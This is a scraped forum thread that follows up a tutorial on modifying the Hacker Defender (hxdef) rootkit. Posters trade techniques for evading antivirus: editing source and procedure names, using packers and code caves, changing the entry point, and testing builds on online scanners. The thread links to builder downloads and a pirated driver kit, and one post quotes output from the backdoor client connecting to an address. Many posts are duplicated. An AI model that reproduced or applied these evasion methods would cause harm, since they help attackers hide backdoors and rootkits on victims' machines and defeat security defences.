Online Virus Scanner
http://www.kaspersky.com/scanforvirus.html
http://www3.ca.com/securityadvisor/virusinfo/scan.aspx
http://www.bitdefender.com/scan/Msie/index.php
only kaspersky can detect the Hxdef Rootkit~
and it can detect the drivers.sys also
i think kaspersky detect the drivers.sys in the hxdef100.exe,and it called hxdef100.exe is a virus
so how to modify the drivers.sys
Full Version: [tut] Modifying Hxdef Rootkit
not only the .sys is detected. i tried modifying almost line per line in hxdef100.dpr , (without the sys compiled) and kaspersky still detects it, i tried too to edit assembler functions but i had no success 
, i dont understand what string or functions is looked for by the kaspersky
, i dont understand what string or functions is looked for by the kaspersky
avg6 detects it too :| norton corporate and mcafee didn't 
Thanks for the tut, seems very in depth and I am going to try it soon 
i really like that tut and gonna test that now...
big big thnx for that info...
big big thnx for that info...
is using hxdef better than using radmin?
hxdef is some kind of rootkit, that means it hides ur files, services and processes
it has a backdoor, shell based
radmin is alike vnc or shadow, its used to control remotly the system
it has a backdoor, shell based
radmin is alike vnc or shadow, its used to control remotly the system
ok thanks for the explanation 8ball, if i don't need to necessarily be able to control the box by mouse and keyboard, just possibily be able to view the screen (this is not big importance) and to send commands via prompt and transfer files, what do you all suggest?
player: radmin or remote anywhere
i tried but it gets detected by f-secure which is damn well annoying :|
i tried but it gets detected by f-secure which is damn well annoying :|
Ok, I still get PMs (which is cool) about this topic...
So, I will be posting a updated tutorial that doesn't require cracking etc etc, with some tricks to bypass KAV as of today (October 24th).
It'll hopefully be up later this week in a new thread to keep easier track of replies
hxxp://s91259931.onlinehome.us/files/hxdef-builder-3.rar
This allows you to compile entire hxdef, just extract *.dpr files to the base dir w/ BATs, then extract the driver.[h/c] to the driver directory and hit build-all when done!
Enjoy!
So, I will be posting a updated tutorial that doesn't require cracking etc etc, with some tricks to bypass KAV as of today (October 24th).
It'll hopefully be up later this week in a new thread to keep easier track of replies
hxxp://s91259931.onlinehome.us/files/hxdef-builder-3.rar
This allows you to compile entire hxdef, just extract *.dpr files to the base dir w/ BATs, then extract the driver.[h/c] to the driver directory and hit build-all when done!
Enjoy!
QUOTE(ArEs @ May 4 2004, 02:00 PM)
yeah wodnerful thx it looks great haven`t tested yet but really sounds good !!!!!
hmmm i can`t find xp ddk on filemirror...as it seems ddk ( driver development kit) is only availibele from msdn now ? and u have ti register a .net passport for that...any othe sources ?
hmmm i can`t find xp ddk on filemirror...as it seems ddk ( driver development kit) is only availibele from msdn now ? and u have ti register a .net passport for that...any othe sources ?
Try this link:
http://club.shelek.com/download.php?id=5
Otherwise search for ddk_xp.iso at google.com and u'll find a bunch of mirrors.
Or i noticed atm. Search for ddk_xp.iso at filemirrors.com and u'll find results
thx for the tut.. was looking for something like this...
modded all the parts.. but when I run the rk it doesnt drop the driver file?
no driver - no connex...
any ideas?
am using as a test .. can see exe running in process list on test machine..
>>edit.. ok dumb me.. forgot to change driverfilename in ini file.. driver file now drops but still no connection ?
modded all the parts.. but when I run the rk it doesnt drop the driver file?
no driver - no connex...
any ideas?
am using as a test .. can see exe running in process list on test machine..
QUOTE
Microsoft Windows XP [Version 5.1.2600]
© Copyright 1985-2001 Microsoft Corp.
D:\Personal\Test Stuff\rootkit source\bdcli100.exe
Host: 192.5.10.113
Port: 139
Pass: test
connecting server ...
receiving banner ...
opening backdoor .....................
backdoor is not installed on 192.5.10.113:139
© Copyright 1985-2001 Microsoft Corp.
D:\Personal\Test Stuff\rootkit source\bdcli100.exe
Host: 192.5.10.113
Port: 139
Pass: test
connecting server ...
receiving banner ...
opening backdoor .....................
backdoor is not installed on 192.5.10.113:139
>>edit.. ok dumb me.. forgot to change driverfilename in ini file.. driver file now drops but still no connection ?
thx a million for this one dude 
:D:D
u dont know how much u helped me whit this
thx again!
:D:Du dont know how much u helped me whit this
thx again!
thx i gonna try this one also
morphin also helps
morphin also helps
i have one big problem. the .ini file is detected by av, even if i rename it to whatever (tried several names and fileextensions). even the extra characters that can be used didn't fix the problem.
any suggestions?
any suggestions?
use some special carakter like toldin the readme
Hi thanks for this great tutorial 
I just have a (small) problem while using the hxdef builder
The driver is not being compiled, and strangly i don't get any error message from the build, and nothing in the objw2k_fre.log too !
So I checked the bat files and also the setw2k.bat to see what was going wrong... nothing suspicious
I also changed the pathes in the build.dat file so that it fits my own environment
I'm stucked there and didn't have time yesterday to dig deeply into it, but maybe someone has an idea which would help ?
Anyway the build of hxdef (with the old driver.sys) is working beautifully, and is not being detected
I just need the driver now
I just have a (small) problem while using the hxdef builder
The driver is not being compiled, and strangly i don't get any error message from the build, and nothing in the objw2k_fre.log too !
So I checked the bat files and also the setw2k.bat to see what was going wrong... nothing suspicious
I also changed the pathes in the build.dat file so that it fits my own environment
I'm stucked there and didn't have time yesterday to dig deeply into it, but maybe someone has an idea which would help ?
Anyway the build of hxdef (with the old driver.sys) is working beautifully, and is not being detected
I just need the driver now
I did the same VaanDer.. modded both the header file and c file for the driver including all variables, etc.. still Kav catches the damn sys file!...
lol
phaeton... hangign on for this post dude
lol
phaeton... hangign on for this post dude
QUOTE
some tricks to bypass KAV as of today (October 24th).
i did both versions....
on "classic" and one with the hxdef-builder...
the hxdef-builder has several errors with i was not able to fix completely...
the delphi-building is no prob but the c-driver doesn't get compled
must be a error in one of the macro-files i guess... will see....
my prob is that the ddk_xp.iso isn't available anymore on filemirrors and i dind't find it anywhere else for download... only dead links...
i downloaded the ddk_xp.iso three times before but all have been corruptet so i wasn't able to install it...
if somebody could be so patient to send, up, or tell me where to get it i would be very appreciated and thankfull!!!
on "classic" and one with the hxdef-builder...
the hxdef-builder has several errors with i was not able to fix completely...
the delphi-building is no prob but the c-driver doesn't get compled
must be a error in one of the macro-files i guess... will see....
my prob is that the ddk_xp.iso isn't available anymore on filemirrors and i dind't find it anywhere else for download... only dead links...
i downloaded the ddk_xp.iso three times before but all have been corruptet so i wasn't able to install it...
if somebody could be so patient to send, up, or tell me where to get it i would be very appreciated and thankfull!!!
tnx alot dude! good post and nice reading :-)
QUOTE(eftex @ Nov 17 2004, 03:09 PM)
i did both versions....
on "classic" and one with the hxdef-builder...
the hxdef-builder has several errors with i was not able to fix completely...
the delphi-building is no prob but the c-driver doesn't get compled
must be a error in one of the macro-files i guess... will see....
my prob is that the ddk_xp.iso isn't available anymore on filemirrors and i dind't find it anywhere else for download... only dead links...
i downloaded the ddk_xp.iso three times before but all have been corruptet so i wasn't able to install it...
if somebody could be so patient to send, up, or tell me where to get it i would be very appreciated and thankfull!!!
on "classic" and one with the hxdef-builder...
the hxdef-builder has several errors with i was not able to fix completely...
the delphi-building is no prob but the c-driver doesn't get compled
must be a error in one of the macro-files i guess... will see....
my prob is that the ddk_xp.iso isn't available anymore on filemirrors and i dind't find it anywhere else for download... only dead links...
i downloaded the ddk_xp.iso three times before but all have been corruptet so i wasn't able to install it...
if somebody could be so patient to send, up, or tell me where to get it i would be very appreciated and thankfull!!!
Yeah same prob here ! cant find it anywhere !
why not changing all the variables names ?
you're sure to have an undetect exe... no ?
you're sure to have an undetect exe... no ?
QUOTE(Intox @ Nov 28 2004, 12:40 AM)
why not changing all the variables names ?
you're sure to have an undetect exe... no ?
you're sure to have an undetect exe... no ?
No... Rarely AVs use variables names in their signs... It would be too easy... :]
Moreover I think that with variables names the sign could change with a different configuration of the server, and at the begining the signs shouldn't change if you want to identify the RAT...
XP DDK (filemirrors.com -> xp_ddk.iso)
broken link? i search this tool, or help
broken link? i search this tool, or help
its all ok, sry .d
first of all take out that backdoor from that scource
then u should do it like in that tut
then use some packer and edit that file
code graves could help u
changeing that entirpoit is next step
then u should do it like in that tut
then use some packer and edit that file
code graves could help u
changeing that entirpoit is next step
Could you specify what you mean by the backdoor? (the built in backdoor by hxdef?)
Also, you need to change the references to the table names from the INI now, make sure you update your ini accordingly, or you can just compile some specific settings also to change the signature of the file...
Also, you need to change the references to the table names from the INI now, make sure you update your ini accordingly, or you can just compile some specific settings also to change the signature of the file...
yeah i deleted that build in backdoor (4 antirootkitdetektortrick)
then i changed that switches (e.g. -install)
renamed the prozedurnames
some little code manipulation
build it -> works
then edit my .exe -- added some tables,made an other entrypoint,used code caves 2 jump
checked it -> works
uploaded it 2 an scan site ->undetected
used 2 diffrent rootkitdetector -> could not found it
yeah thats all
isnt life easy?
then i changed that switches (e.g. -install)
renamed the prozedurnames
some little code manipulation
build it -> works
then edit my .exe -- added some tables,made an other entrypoint,used code caves 2 jump
checked it -> works
uploaded it 2 an scan site ->undetected
used 2 diffrent rootkitdetector -> could not found it
yeah thats all
isnt life easy?
all link for hxdef-build are dead, do you have the hxdef-builder ???
where can i get xp_ddk.iso?
@KillerTom:
Link not working.: "Angelfire does not allow direct linking
from offsite, non-Angelfire pages,
to files hosted on Angelfire."
Link not working.: "Angelfire does not allow direct linking
from offsite, non-Angelfire pages,
to files hosted on Angelfire."
@otcem
h*$p://shelek.tmf.ru/archive/ddk/DDK_XP.ISO
h*$p://shelek.tmf.ru/archive/ddk/DDK_XP.ISO
@ Killer Tom
"The page you are attempting to access has been removed because it violated Angelfire's Terms of Service."
"The page you are attempting to access has been removed because it violated Angelfire's Terms of Service."
QUOTE(Titus @ Jan 30 2005, 03:47 PM)
@otcem
h*$p://shelek.tmf.ru/archive/ddk/DDK_XP.ISO
h*$p://shelek.tmf.ru/archive/ddk/DDK_XP.ISO
The only thing i was getting was 404's when i googled it!
Thanks Titus
Could anyone post a working link for the hxdef builder cause they're all dead!
Yeah anyone please upload the builder again!
And this time please attach it and don't upload it to webpsace. Thanks
And this time please attach it and don't upload it to webpsace. Thanks
QUOTE(Titus @ Jan 30 2005, 03:47 PM)
@otcem
h*$p://shelek.tmf.ru/archive/ddk/DDK_XP.ISO
h*$p://shelek.tmf.ru/archive/ddk/DDK_XP.ISO
DDK is only available from MS website by ordering a cd. This is bordering on a warez link.
Also note that you really should be building drivers with latest DDK which is DDK Server 2003.
hmmm i have the other ddk
when did ddk 2003 come out?
still only on ms site?
stupid ms
when did ddk 2003 come out?
still only on ms site?
stupid ms
The problem is that we don't need the ddk but the hxdef builder
building hxdef is very simple... from a ddk free build environment you type build... and then you load up delphi and compile the userland part.
you really dont need a "hxdef builder".
you really dont need a "hxdef builder".
yes but unfortunately the avs detect hxdef when its compiled with the delphi trail no matter what you change in the code and thats why i want the hxdef builder
h**p://rapidshare.de/files-en/599195/hxdef-builder-3.rar.html
thanks you cowsonfire, your link working fine
yeah thanks for the link cowsonfire u helped me a lot!
lol i can't believe it...a n00bs hxdef building tool...how sad!
this wont help u stay undetected, you need to modify the source code for that.
this wont help u stay undetected, you need to modify the source code for that.
okay i modded the source, but where to put the src files in the "hxdef-builder-3 dir"
thanks for hints
my src files are in a dir called src
thanks for hints
my src files are in a dir called src
hxdef-builder is a tool to complie hxdef in one easy step rather than compiling everything step by step liek phaeton explains on page one. nonetheless his way is stil working and as there is no valid link to hxdef builder atm,. you will need to compile with Delpfi and DDK and stuff like phaeton explained.
The only problem with the delphi trail is that it adds some kind of code to the exe and the avs detect this no matter what u change but my version is now undetected and i compiled it with the hxdef builder and @ tibbar no one said that this tool is able to make hxdef undetected ... .
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
